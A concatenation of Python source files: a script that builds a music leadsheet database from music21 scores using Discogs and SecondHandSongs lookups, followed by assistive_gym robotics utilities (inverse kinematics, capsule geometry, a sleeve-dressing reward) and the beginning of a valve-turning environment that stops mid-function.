def detectGenres(query: str, depth: int, num_of_items: int, client: discogs_client.Client)-> List:
""" detect genres using discogs client.
:depth: number of song to be used
:num_of_items: number of items in the list returned
:d: discogs client object
:returns: list of list of tuples:
[
[(genre1, occurrences), (genre2, occurrences), ...],
[(style1, occurrences), (style2, occurrences), ...]
]
"""
r = client.search(query, type='release')
r = r.sort('year')
# populate genres_stats list
genres_stats = defaultdict(int)
styles_stats = defaultdict(int)
r.per_page = depth
l = r.page(1)
for release in l:
genres = release.fetch('genre')
if genres is not None:
for k in genres:
genres_stats[k] += 1
if release.styles is not None:
for k in release.styles:
styles_stats[k] += 1
genres = []
styles = []
if len(genres_stats) > 0:
twoMostCommon(num_of_items, genres_stats, genres)
if len(styles_stats) > 0:
twoMostCommon(num_of_items, styles_stats, styles)
return [genres, styles]
def twoMostCommon(num_of_items, dictionary, listOfTuples):
for i in range(num_of_items):
if i < len(dictionary):
most_common_tuple = max(dictionary.items(),
key=operator.itemgetter(1))
dictionary.pop(most_common_tuple[0])
listOfTuples.append(most_common_tuple)
def getComposerInfoByUri(uri: str) -> Dict:
""":returns: same as @getComposerInfoByName"""
r = requests.get(uri, params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getComposerInfoByUri(uri)
composer = {
'correct_name': data.get('commonName'),
'home_country': data.get('homeCountry'),
'birth': formatDate(data.get('birthDate')),
'death': formatDate(data.get('deathDate'))
}
return composer
def getComposerInfoByName(name: str) -> Dict:
""" :retuns: a dictionary containing the birth date, the death date, the
actual name and the nationality of the composer
"""
url = 'https://secondhandsongs.com/search/artist'
params = {
'format': 'json',
'commonName': name
}
resp = requests.get(url=url, params=params)
data = json.loads(resp.text)
if checkingErrors(data):
return getComposerInfoByName(name)
if len(data.get('resultPage') or '') == 0:
return None
artist_page = data['resultPage'][0]['uri']
return getComposerInfoByUri(artist_page)
def formatDate(date) -> str:
if date is None:
return None
tokens = str(date).split('-', 3)
returned = ''
if len(tokens) == 1:
returned = tokens[0] + '-00-00'
elif len(tokens) == 2:
returned = tokens[0] + '-' + tokens[1] + '-00'
else:
returned = tokens[0] + '-' + tokens[1] + '-' + tokens[2]
return returned
def getWorkInfo(title: str, composer: str) -> Dict:
""" :returns: a dict with work info """
url = 'https://secondhandsongs.com/search/work'
params = {
'format': 'json',
'credits': composer,
'title': title
}
resp = requests.get(url=url, params=params)
data = json.loads(resp.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
if len(data.get('resultPage') or '') == 0:
return None
work_page = data['resultPage'][0]['uri']
r = requests.get(work_page, params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
all_authors = []
for i in data.get('credits'):
all_authors.append(i.get('uri'))
work = {
'language': data.get('language'),
'correct_title': data.get('title'),
'correct_credits_uri': all_authors,
}
if data.get('original') is not None:
original_performance_page = data['original'].get('uri')
r = requests.get(original_performance_page,
params={'format': 'json'})
data = json.loads(r.text)
if checkingErrors(data):
return getWorkInfo(title, composer)
work['original_performance_date'] = formatDate(data.get('date'))
else:
work['original_performance_date'] = None
return work
def getTonality(score: stream.Score)-> key.Key:
""" :returns: a key.Key object representing tonality detected by Krumhanslschumckler
algorithm, only if its 'tonalCertainty()' is >= 0.9, None otherwise
"""
try:
estimated = score.analyze('key.krumhanslschmuckler')
except Exception:
return None
if estimated.tonalCertainty() < 0.9:
return None
else:
return estimated
def scoreIsCompatible(s: stream.Score) -> bool:
""" parse a s and returs True if it is compatible with our symbolic
representation system
This also sets the 'timeSignature', 'keySignature', 'incipitType' and
'hasTriplets' in compatible stream.Score objects
"""
# no multiple voices are allowed
print('checking compatibility...')
sc = s.explode()
# only one part is allowed
print('\tchecking parts (only one allowed)...')
if hasattr(sc, 'parts'):
if len(sc.parts) > 1:
return False
# only one key signature is allowed
print('\tchecking key signatures (only one allowed)...')
signatures = s.flat.getKeySignatures()
if len(signatures) > 1:
for signature in signatures:
if signature.asKey().name != signatures[0].asKey().name:
return False
# looking for the right tonality
estimated = getTonality(s)
if estimated is not None:
s.keySignature = estimated.asKey()
elif len(signatures) == 0:
return False
else:
s.keySignature = signatures[0].asKey()
# only one time signature is allowed
print('\tchecking time signatures (only one allowed)...')
signatures = s.flat.getTimeSignatures()
if len(signatures) > 1:
for signature in signatures:
if signature.ratioString != signatures[0].ratioString:
return False
elif len(signatures) == 0:
return False
measure_length = signatures[0].numerator / signatures[0].denominator * 4
s.timeSignature = signatures[0]
# no multiple white measures in incipit
# setting incipit type
print('\tchecking no multiple white measures at the beginning...')
for m in s.recurse().getElementsByClass(stream.Measure):
if len(m.recurse().getElementsByClass(note.Note)) == 0:
m.containerHierarchy()[0].remove(m)
else:
n = m.recurse().getElementsByClass(note.Note)[0]
if n.offset > 0:
s.incipitType = 'acefalo'
elif m.duration.quarterLength < measure_length:
s.incipitType = 'anacrusi'
else:
s.incipitType = 'tetico'
break
# no multiple white measures at the end
print('\tchecking no multiple white measures at the end...')
it = s.recurse().getElementsByClass(stream.Measure)
for m in reversed(it):
if len(m.recurse().getElementsByClass(note.Note)) == 0:
m.containerHierarchy()[0].remove(m)
else:
break
print('\tchecking triplets and chords...')
s.hasTriplets = False
noChordSymbol = True
it = s.flat.notesAndRests
i = 0
while i < len(it):
n = it[i]
if type(n) is harmony.ChordSymbol:
noChordSymbol = False
i += 1
continue
# no written chords allowed
if type(n) is chord.Chord:
print('----Chords are not allowed----')
return False
# triplets checking:
if len(n.duration.tuplets) > 0:
tuplet = n.duration.tuplets[0]
# only triplets are allowed
if tuplet.numberNotesActual > 3:
print('----Only triplets are allowed----')
return False
# the following is to check the nesting level
if tuplet.nestedLevel > 1:
print('----only one nested level is allowed----')
return False
# only if it is contained in one measure
if tuplet.totalTupletLength() > measure_length:
print('----tuplets are allowed only in the same measure----')
return False
s.hasTriplets = True
i += 3
else:
i += 1
if noChordSymbol:
print('----No chords annotated----')
return False
return True
def copyToDir(s: stream.Score, dir: str):
path = os.path.join(dir, s.metadata.composer +
'-' + s.metadata.title + '.xml')
s.write(fp=path)
def fixStrangeCharacters(title, composer):
composer = composer.translate(
{ord(c): " " for c in "!@#$%^&*()[]{};:,./<>?\|~-=_+"})
composer = composer.translate(
{ord(c): "'" for c in "`"})
title = title.translate(
{ord(c): " " for c in "@#$%^&*()[]{};:./<>\|~-=_+"})
title = title.translate(
{ord(c): "'" for c in "`"})
return title, composer
def writeCompressedMxl(xml: str, filename_without_extension: str,
filepath_without_extension: str):
zf = zipfile.ZipFile(filepath_without_extension + '.mxl', mode='w',
compression=zipfile.ZIP_DEFLATED)
zi = zipfile.ZipInfo('META-INF' + os.sep + 'container.xml')
zi.external_attr = 0o660 << 16
zf.writestr(zi,
"<?xml version='1.0' encoding='UTF-8'?>"
"<container><rootfiles><rootfile full-path='{0}.xml'/>"
"</rootfiles></container>".format(filename_without_extension))
zi = zipfile.ZipInfo(filename_without_extension + '.xml')
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = 0o660 << 16
zf.writestr(zi, xml)
zf.close()
def checkingErrors(response: Dict):
# checking errors
error = response.get('error')
if error is not None:
if error.get('code') == 10007:
print('too many requests... wait a bit and retry')
time.sleep(30)
return True
return False
def secondHandSongsInfo(s: stream.Score):
""" Queries secondhandsongs.com to gather work and composers info
:returns: a list containing work and composers dictionaries
"""
title = s.metadata.title
composer = s.metadata.composer
if title == '' or title is None or composer == '' or composer is None:
return {}, []
# removing strange characters
title, composer = fixStrangeCharacters(title, composer)
# trying to get work info
print('querying secondhandsongs.com for work and artists info...')
work = getWorkInfo(title, composer)
if work is None:
author = getComposerInfoByName(composer)
if author is not None:
work = getWorkInfo(title, author)
if work is None:
work = getWorkInfo(title, composer.split(None, 1)[0])
if work is None:
work = getWorkInfo(title, '')
if work is None:
return {}, []
# trying to get composers info
composers = []
for uri in work.get('correct_credits_uri'):
composers.append(getComposerInfoByUri(uri))
return work, composers
def collectData(s: stream.Score, new_dataset_dir: str, id: int, filename: str):
""" :returns: a dictionary containing 'name of table': 'entry as tuple'
or None if it is untreatable
"""
# collecting data
print('collecting data...')
work, composers = secondHandSongsInfo(s)
if 'correct_title' in work and len(composers) > 0:
# getting genres and styles
print('querying discogs for genre detection...')
discogs_query = work.get('correct_title') or ''
for c in composers:
correct_name = c.get('correct_name') or ''
discogs_query += ' ' + correct_name
if discogs_query == '':
genres = styles = []
else:
genres, styles = detectGenres(
discogs_query, depth=5, num_of_items=2, client=d)
else:
genres = styles = []
composers.append({'correct_name': '[Unknown]'})
if s.metadata.title != '':
work['correct_title'] = s.metadata.title
else:
work['correct_title'] = filename.split(
'_-_', 1)[-1].replace('_', ' ')
# lyrics
print('writing lyrics and leadsheet...')
lyrics = text.assembleAllLyrics(s).replace('\n', '')
# computing file name
output_dir = ''
for c in composers:
correct_name = c.get('correct_name') or ''
output_dir += correct_name + '-'
correct_title = work.get(
'correct_title').replace(' ', '_').replace('/', '-')
output_dir = output_dir[:-1].replace(' ', '_')
output_dir = os.path.join(
new_dataset_dir, output_dir, correct_title)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_path = os.path.join(output_dir, correct_title)
# writing lyrics file
with open(output_path + ".txt", "w") as lyrics_file:
print(lyrics, file=lyrics_file)
first_measure = s.recurse().getElementsByClass(stream.Measure)[0].number
s.measure(first_measure).timeSignature = s.timeSignature
s.measure(first_measure).keySignature = s.keySignature
# creating xml string (out is bytes in Py3)
xml = musicxml.m21ToXml.GeneralObjectExporter(s).parse().decode('utf-8')
# writing musicxml compressed file
writeCompressedMxl(xml, work['correct_title'], output_path)
# getting all features
print('computing features...')
f = features.base.allFeaturesAsList(s)
# writing features csv
# use features.base.getIndex('name') to get the row index of a certain
# feature, or something like [x.id for x in features.extractorsById('all')]
# to get the feature id at the same index position as in the csv
print('writing features...')
with open(output_path + '.csv', 'a') as features_file:
writer = csv.writer(features_file)
writer.writerows(f[0])
writer.writerows(f[1])
# creating output dictionary
data = createDataDictionary(
id, work, output_path, s, genres, styles, composers)
return data
def createDataDictionary(id, work, output_path, s, genres, styles, composers):
data = {
'works': [(id, work.get('correct_title'),
work.get('original_performance_date'),
work.get('language'), output_path + '.txt',
output_path + '.mxl')],
'features': [(id, s.timeSignature.ratioString, s.keySignature.name,
s.incipitType, s.hasTriplets, output_path + '.csv')],
'authors': [],
'work_genres': [],
'work_style': [],
'work_author': []
}
for genre in genres:
data['work_genres'].append((id, genre[0], genre[1]))
for style in styles:
data['work_style'].append((id, style[0], style[1]))
for composer in composers:
# here 'correct_name' is used twice because the second is needed to
# check that this author is not already inserted
data['authors'].append((composer.get('correct_name'), composer.get('birth'),
composer.get('death'), composer.get(
'home_country'),
composer.get('correct_name')))
data['work_author'].append((id, composer.get('correct_name')))
return data
class DBInterface():
""" A class to interface to the SQLite Database """
temp_data = {
'works': [],
'features': [],
'authors': [],
'work_author': [],
'work_genres': [],
'work_style': []
}
counter = 0
def firstIndex(self):
""" get the first available index of a work """
self.cursor.execute('select max(id) from works')
i = self.cursor.fetchone()[0]
if i is not None:
i += 1
else:
i = 0
return i
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __init__(self, path_to_db):
""" creates a new db at :path_to_db address using file named
'db_creation.sql' as starting point """
try:
self.connection = sqlite3.connect(path_to_db)
self.cursor = self.connection.cursor()
print("Reading SQL Script...")
scriptfilename = 'db_creation.sql'
scriptFile = open(scriptfilename, 'r')
script = scriptFile.read()
scriptFile.close()
self.cursor.executescript(script)
self.connection.commit()
except Exception:
print("can't create db... exiting")
traceback.print_exc()
sys.exit(3)
def addToDB(self, data):
""" add data to the database """
for k in data.keys():
self.temp_data[k] += data[k]
self.counter += 1
if self.counter == 10:
self.__commitData()
self.counter = 0
def __commitData(self):
print("____________ WRITING DATA TO DB _____________")
self.cursor.executemany(
'INSERT INTO works VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['works'])
self.cursor.executemany(
'INSERT INTO authors SELECT ?, ?, ?, ? WHERE NOT EXISTS \
(SELECT 1 FROM authors WHERE common_name = ?)',
self.temp_data['authors'])
self.cursor.executemany(
'INSERT INTO features VALUES (?, ?, ?, ?, ?, ?)', self.temp_data['features'])
self.cursor.executemany(
'INSERT INTO work_author VALUES (?, ?)', self.temp_data['work_author'])
self.cursor.executemany(
'INSERT INTO work_genres VALUES (?, ?, ?)', self.temp_data['work_genres'])
self.cursor.executemany(
'INSERT INTO work_style VALUES (?, ?, ?)', self.temp_data['work_style'])
try:
self.connection.commit()
except Exception:
print("can't write to db... exiting")
traceback.print_exc()
sys.exit(3)
for k in self.temp_data.keys():
self.temp_data[k] = []
def __del__(self):
self.__commitData()
self.connection.close()
def main(dbManager):
# loading file names
parser = argparse.ArgumentParser()
parser.add_argument("--dir", "-d", type=str, required=True)
args = parser.parse_args()
if not os.path.isdir(args.dir):
print('Directory ' + args.dir + ' does not exists!')
sys.exit(2)
new_dataset_dir = 'dataset'
if not os.path.exists(new_dataset_dir):
os.makedirs(new_dataset_dir)
filenames = os.listdir(args.dir)
exception_dir = 'exception_dir'
if not os.path.exists(exception_dir):
os.makedirs(exception_dir)
not_compatible_dir = 'not_compatible'
if not os.path.exists(not_compatible_dir):
os.makedirs(not_compatible_dir)
id = dbManager.firstIndex()
for filename in filenames:
print('------------------------------------')
print('analysing ' + filename)
# opening file
pathname = os.path.join(args.dir, filename)
if not os.path.isfile(pathname):
continue
s = None
try:
s = converter.parse(pathname)
except KeyboardInterrupt:
return
except Exception:
print('invalid file' + pathname)
continue
try:
if scoreIsCompatible(s):
data = collectData(s, new_dataset_dir, id, filename)
if data is None:
composer_title_unknown_dir = 'unknown'
if not os.path.exists(composer_title_unknown_dir):
os.makedirs(composer_title_unknown_dir)
copyToDir(s, composer_title_unknown_dir)
else:
id += 1
print('adding score number ', id)
dbManager.addToDB(data)
os.remove(pathname)
else:
os.remove(pathname)
except Exception as e:
log_filename = os.path.join(exception_dir, filename)
s.write(fp=log_filename + '.xml')
with open(log_filename + ".log", "w") as log_file:
print(traceback.format_exc(), file=log_file)
d = discogs_client.Client(
'SMC application', user_token="<KEY>")
dbManager = DBInterface('EWLD.db')
main(dbManager)
del dbManager
``` |
{
"source": "00schen/asha",
"score": 2
} |
#### File: assistive_gym/envs/util.py
```python
import numpy as np
import pybullet as p
class Util:
def __init__(self, pid, np_random):
self.id = pid
self.ik_lower_limits = {}
self.ik_upper_limits = {}
self.ik_joint_ranges = {}
self.ik_rest_poses = {}
self.np_random = np_random
def ik_random_restarts(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, best_ik_joints = None, ik_indices=range(29, 29+7), max_iterations=1000, max_ik_random_restarts=50, random_restart_threshold=0.01, half_range=False, step_sim=False, check_env_collisions=False):
orient_orig = target_orient
best_ik_distance = 0
for r in range(max_ik_random_restarts):
target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, mean_rest_pose=best_ik_joints, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range)
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None)
if step_sim:
for _ in range(5):
p.stepSimulation(physicsClientId=self.id)
if len(p.getContactPoints(bodyA=body, bodyB=body, physicsClientId=self.id)) > 0 and orient_orig is not None:
# The robot's arm is in contact with itself. Continually randomize end effector orientation until a solution is found
target_orient = p.getQuaternionFromEuler(p.getEulerFromQuaternion(orient_orig, physicsClientId=self.id) + np.deg2rad(self.np_random.uniform(-45, 45, size=3)), physicsClientId=self.id)
if check_env_collisions:
for _ in range(25):
p.stepSimulation(physicsClientId=self.id)
gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True, physicsClientId=self.id)[:2]
if np.linalg.norm(target_pos - np.array(gripper_pos)) < random_restart_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < random_restart_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=random_restart_threshold)):
return True, np.array(target_joint_positions)
if best_ik_joints is None or np.linalg.norm(target_pos - np.array(gripper_pos)) < best_ik_distance:
best_ik_joints = target_joint_positions
best_ik_distance = np.linalg.norm(target_pos - np.array(gripper_pos))
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(best_ik_joints), tool=None)
return False, np.array(best_ik_joints)
def ik_jlwki(self, body, target_joint, target_pos, target_orient, world_creation, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, ik_indices=range(29, 29+7), max_iterations=100, success_threshold=0.03, half_range=False, step_sim=False, check_env_collisions=False):
target_joint_positions = self.ik(body, target_joint, target_pos, target_orient, ik_indices=ik_indices, max_iterations=max_iterations, half_range=half_range)
world_creation.setup_robot_joints(body, robot_arm_joint_indices, robot_lower_limits, robot_upper_limits, randomize_joint_positions=False, default_positions=np.array(target_joint_positions), tool=None)
if step_sim:
for _ in range(5):
p.stepSimulation(physicsClientId=self.id)
if len(p.getContactPoints(bodyA=body, bodyB=body, physicsClientId=self.id)) > 0:
# The robot's arm is in contact with itself.
return False, np.array(target_joint_positions)
if check_env_collisions:
for _ in range(25):
p.stepSimulation(physicsClientId=self.id)
gripper_pos, gripper_orient = p.getLinkState(body, target_joint, computeForwardKinematics=True, physicsClientId=self.id)[:2]
if np.linalg.norm(target_pos - np.array(gripper_pos)) < success_threshold and (target_orient is None or np.linalg.norm(target_orient - np.array(gripper_orient)) < success_threshold or np.isclose(np.linalg.norm(target_orient - np.array(gripper_orient)), 2, atol=success_threshold)):
return True, np.array(target_joint_positions)
return False, np.array(target_joint_positions)
def ik(self, body, target_joint, target_pos, target_orient, mean_rest_pose=None, ik_indices=range(29, 29+7), max_iterations=1000, half_range=False):
key = '%d_%d' % (body, target_joint)
if key not in self.ik_lower_limits:
self.ik_lower_limits[key] = []
self.ik_upper_limits[key] = []
self.ik_joint_ranges[key] = []
self.ik_rest_poses[key] = []
j_names = []
for j in range(p.getNumJoints(body, physicsClientId=self.id)):
if p.getJointInfo(body, j, physicsClientId=self.id)[2] != p.JOINT_FIXED:
joint_info = p.getJointInfo(body, j, physicsClientId=self.id)
lower_limit = joint_info[8]
upper_limit = joint_info[9]
if lower_limit == 0 and upper_limit == -1:
lower_limit = -2*np.pi
upper_limit = 2*np.pi
self.ik_lower_limits[key].append(lower_limit)
self.ik_upper_limits[key].append(upper_limit)
if not half_range:
self.ik_joint_ranges[key].append(upper_limit - lower_limit)
else:
self.ik_joint_ranges[key].append((upper_limit - lower_limit)/2.0)
j_names.append([len(j_names)] + list(joint_info[:2]))
self.ik_rest_poses[key] = self.np_random.uniform(self.ik_lower_limits[key], self.ik_upper_limits[key])
if mean_rest_pose is not None:
self.ik_rest_poses[key][ik_indices] = np.clip(self.np_random.normal(mean_rest_pose,0.5),np.array(self.ik_lower_limits[key])[ik_indices], np.array(self.ik_upper_limits[key])[ik_indices])
self.ik_rest_poses[key] = self.ik_rest_poses[key].tolist()
if target_orient is not None:
ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, targetOrientation=target_orient, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, physicsClientId=self.id))
else:
ik_joint_poses = np.array(p.calculateInverseKinematics(body, target_joint, targetPosition=target_pos, lowerLimits=self.ik_lower_limits[key], upperLimits=self.ik_upper_limits[key], jointRanges=self.ik_joint_ranges[key], restPoses=self.ik_rest_poses[key], maxNumIterations=max_iterations, physicsClientId=self.id))
target_joint_positions = ik_joint_poses[ik_indices]
return target_joint_positions
def points_in_cylinder(self, pt1, pt2, r, q):
vec = pt2 - pt1
const = r * np.linalg.norm(vec)
return np.dot(q - pt1, vec) >= 0 and np.dot(q - pt2, vec) <= 0 and np.linalg.norm(np.cross(q - pt1, vec)) <= const
def point_on_capsule(self, p1, p2, radius, theta_range=(0, np.pi*2)):
'''
Pick a random point along the outer surface of a capsule (cylinder)
'''
# Pick a random point along the length of the capsule
axis_vector = p2 - p1
random_length = self.np_random.uniform(radius, np.linalg.norm(axis_vector))
# Normalize axis vector to unit length
axis_vector = axis_vector / np.linalg.norm(axis_vector)
ortho_vector = self.orthogonal_vector(axis_vector)
# Normalize orthogonal vector to unit length
ortho_vector = ortho_vector / np.linalg.norm(ortho_vector)
# Determine normal vector through cross product (this will be of unit length)
normal_vector = np.cross(axis_vector, ortho_vector)
# Pick a random rotation along the cylinder
theta = self.np_random.uniform(theta_range[0], theta_range[1])
point = p1 + random_length*axis_vector + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector
return point
def capsule_points(self, p1, p2, radius, distance_between_points=0.05):
'''
Creates a set of points around a capsule.
Check out: http://mathworld.wolfram.com/ConicalFrustum.html
and: http://math.stackexchange.com/questions/73237/parametric-equation-of-a-circle-in-3d-space
sphere = [x, y, z, r]
'''
points = []
p1, p2 = np.array(p1), np.array(p2)
axis_vector = p2 - p1
# Normalize axis vector to unit length
axis_vector = axis_vector / np.linalg.norm(axis_vector)
ortho_vector = self.orthogonal_vector(axis_vector)
# Normalize orthogonal vector to unit length
ortho_vector = ortho_vector / np.linalg.norm(ortho_vector)
# Determine normal vector through cross product (this will be of unit length)
normal_vector = np.cross(axis_vector, ortho_vector)
# Determine the section positions along the frustum at which we will create point around in a circular fashion
sections = int(np.linalg.norm(p2 - p1) / distance_between_points)
section_positions = [(p2 - p1) / (sections + 1) * (i + 1) for i in range(sections)]
for i, section_pos in enumerate(section_positions):
# Determine radius and circumference of this section
circumference = 2*np.pi*radius
# Determine the angle difference (in radians) between points
theta_dist = distance_between_points / radius
for j in range(int(circumference / distance_between_points)):
theta = theta_dist * j
# Determine cartesian coordinates for the point along the circular section of the frustum
point_on_circle = p1 + section_pos + radius*np.cos(theta)*ortho_vector + radius*np.sin(theta)*normal_vector
points.append(point_on_circle)
return points
def orthogonal_vector(self, v):
'''
Two Euclidean vectors are orthogonal if and only if their dot product is zero.
'''
# Find first element in v that is nonzero
m = np.argmax(np.abs(v))
y = np.zeros(len(v))
y[(m+1) % len(v)] = 1
return np.cross(v, y)
def line_intersects_triangle(self, p0, p1, p2, q0, q1):
# Check that the arm line segment intersects two different triangles defined by points around the sleeve.
# https://stackoverflow.com/questions/42740765/intersection-between-line-and-triangle-in-3d
signed_volume = lambda a, b, c, d: (1.0/6.0) * np.dot(np.cross(b-a, c-a), d-a)
if np.sign(signed_volume(q0, p0, p1, p2)) != np.sign(signed_volume(q1, p0, p1, p2)):
if np.sign(signed_volume(q0, q1, p0, p1)) == np.sign(signed_volume(q0, q1, p1, p2)) == np.sign(signed_volume(q0, q1, p2, p0)):
return True
return False
def sleeve_on_arm_reward(self, triangle1_points, triangle2_points, human, hand_radius, elbow_radius, shoulder_radius):
shoulder_pos, shoulder_orient = p.getLinkState(human, 15, computeForwardKinematics=True, physicsClientId=self.id)[:2]
elbow_pos, elbow_orient = p.getLinkState(human, 17, computeForwardKinematics=True, physicsClientId=self.id)[:2]
wrist_pos, wrist_orient = p.getLinkState(human, 19, computeForwardKinematics=True, physicsClientId=self.id)[4:6]
# Use full length of arm, rather than from hand center to elbow center
wrist_pos, elbow_pos, shoulder_pos = np.array(wrist_pos), np.array(elbow_pos), np.array(shoulder_pos)
hand_end_pos = wrist_pos + (wrist_pos - elbow_pos) / np.linalg.norm(wrist_pos - elbow_pos) * hand_radius*2
elbow_end_pos = elbow_pos + (elbow_pos - wrist_pos) / np.linalg.norm(wrist_pos - elbow_pos) * elbow_radius
shoulder_end_pos = shoulder_pos + (shoulder_pos - elbow_pos) / np.linalg.norm(shoulder_pos - elbow_pos) * shoulder_radius
# Given the central axis of the arm, find the plane through the axis and one vector perpendicular to the axis
# and the plane through the axis and the second vector perpendicular to the other two.
# There must be points above and below both of these two planes
# https://math.stackexchange.com/questions/7931/point-below-a-plane
normal_forearm = hand_end_pos - elbow_end_pos
normal_forearm = normal_forearm / np.linalg.norm(normal_forearm)
# Normalized Tangent Vector, assumes arm axis not parallel to vector [1, 1, 0]
tangent_forearm = np.cross(np.array([1, 1, 0]), normal_forearm)
tangent_forearm = tangent_forearm / np.linalg.norm(tangent_forearm)
# Normalized Binormal_forearm or Bitangent_forearm vector
binormal_forearm = np.cross(tangent_forearm, normal_forearm)
binormal_forearm = binormal_forearm / np.linalg.norm(binormal_forearm)
# Check if at least one point exists above and below both planes
# v.dot(p - p0), p0 on plane, v is normal_forearm of a plane. v = tangent_forearm, v = binormal_forearm, p0 = elbow_end_pos
all_points = np.concatenate([triangle1_points, triangle2_points], axis=0)
tangent_forearm_points = np.dot(tangent_forearm, (all_points - elbow_end_pos).T)
binormal_forearm_points = np.dot(binormal_forearm, (all_points - elbow_end_pos).T)
points_above_below_forearm = np.any(tangent_forearm_points > 0) and np.any(tangent_forearm_points < 0) and np.any(binormal_forearm_points > 0) and np.any(binormal_forearm_points < 0)
normal_upperarm = elbow_end_pos - shoulder_end_pos
normal_upperarm = normal_upperarm / np.linalg.norm(normal_upperarm)
tangent_upperarm = np.cross(np.array([1, 1, 0]), normal_upperarm)
tangent_upperarm = tangent_upperarm / np.linalg.norm(tangent_upperarm)
binormal_upperarm = np.cross(tangent_upperarm, normal_upperarm)
binormal_upperarm = binormal_upperarm / np.linalg.norm(binormal_upperarm)
tangent_upperarm_points = np.dot(tangent_upperarm, (all_points - shoulder_end_pos).T)
binormal_upperarm_points = np.dot(binormal_upperarm, (all_points - shoulder_end_pos).T)
points_above_below_upperarm = np.any(tangent_upperarm_points > 0) and np.any(tangent_upperarm_points < 0) and np.any(binormal_upperarm_points > 0) and np.any(binormal_upperarm_points < 0)
# Check that the arm line segment intersects two different triangles defined by points around the sleeve.
# https://stackoverflow.com/questions/42740765/intersection-between-line-and-triangle-in-3d
forearm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], hand_end_pos, elbow_end_pos)
forearm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], hand_end_pos, elbow_end_pos)
upperarm_intersects_triangle1 = self.line_intersects_triangle(triangle1_points[0], triangle1_points[1], triangle1_points[2], elbow_end_pos, shoulder_end_pos)
upperarm_intersects_triangle2 = self.line_intersects_triangle(triangle2_points[0], triangle2_points[1], triangle2_points[2], elbow_end_pos, shoulder_end_pos)
sleeve_center = np.mean(all_points, axis=0)
distance_to_shoulder = np.linalg.norm(shoulder_end_pos - sleeve_center)
distance_to_elbow = np.linalg.norm(elbow_end_pos - sleeve_center)
distance_to_hand = np.linalg.norm(hand_end_pos - sleeve_center)
# Reward forward movement along the arm, away from the hand (pulling the sleeve onto the arm)
distance_along_forearm = np.linalg.norm(sleeve_center - hand_end_pos)
distance_along_upperarm = np.linalg.norm(sleeve_center - elbow_pos)
forearm_in_sleeve = points_above_below_forearm and (forearm_intersects_triangle1 or forearm_intersects_triangle2)
upperarm_in_sleeve = points_above_below_upperarm and (upperarm_intersects_triangle1 or upperarm_intersects_triangle2)
return forearm_in_sleeve, upperarm_in_sleeve, distance_along_forearm, distance_along_upperarm, distance_to_hand, distance_to_elbow, distance_to_shoulder, np.linalg.norm(hand_end_pos - elbow_end_pos), np.linalg.norm(elbow_pos - shoulder_pos)
```
#### File: assistive_gym/envs/valve.py
```python
from gym import spaces
import numpy as np
import pybullet as p
from .env import AssistiveEnv
from gym.utils import seeding
from collections import OrderedDict
import os
import time
reach_arena = (np.array([-.25, -.5, 1]), np.array([.6, .4, .2]))
default_orientation = p.getQuaternionFromEuler([0, 0, 0])
class ValveEnv(AssistiveEnv):
def __init__(self, robot_type='jaco', success_dist=.05, target_indices=None, session_goal=False, frame_skip=5,
capture_frames=False, stochastic=True, debug=False, min_error_threshold=np.pi / 16,
max_error_threshold=np.pi / 4, num_targets=None, use_rand_init_angle=True, term_cond=None,
term_thresh=20, preserve_angle=False, **kwargs):
super(ValveEnv, self).__init__(robot_type=robot_type, task='reaching', frame_skip=frame_skip, time_step=0.02,
action_robot_len=7, obs_robot_len=14)
obs_dim = 3 + 4 + 3 + 2 + 1 + 7 + 7
encoder_obs_dim = 3 + 2
if stochastic:
obs_dim += 3 # for valve pos
encoder_obs_dim += 3
self.observation_space = spaces.Box(-np.inf, np.inf, (obs_dim,), dtype=np.float32)
self.encoder_observation_space = spaces.Box(-np.inf, np.inf, (encoder_obs_dim,), dtype=np.float32)
self.num_targets = num_targets
self.success_dist = success_dist
self.debug = debug
self.stochastic = stochastic
self.goal_feat = ['target_angle'] # Just an FYI
self.feature_sizes = OrderedDict({'goal': 2})
self.session_goal = session_goal
self.use_rand_init_angle = use_rand_init_angle
if self.num_targets is not None:
self.target_angles = np.linspace(-np.pi, np.pi, self.num_targets, endpoint=False)
if not self.use_rand_init_angle:
self.target_angles = np.delete(self.target_angles, np.argwhere(self.target_angles == 0))
self.target_indices = np.arange(len(self.target_angles))
self.min_error_threshold = min_error_threshold
self.max_error_threshold = max_error_threshold
self.error_threshold = min_error_threshold
self.preserve_angle = preserve_angle
self.last_angle = None
self.wall_color = None
self.calibrate = False
self.term_cond = term_cond
self.term_thresh = term_thresh
self.n_success = 0 # number of consecutive steps in success condition
self.target_norm = .55
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
self.init_pos_random, _ = seeding.np_random(seed)
return [seed]
def step(self, action):
old_tool_pos = self.tool_pos
self.take_step(action, robot_arm='left', gains=self.config('robot_gains'), forces=self.config('robot_forces'))
obs = self._get_obs([0])
reward = np.exp(-np.abs(self.angle_diff(self.valve_angle, self.target_angle))) - 1
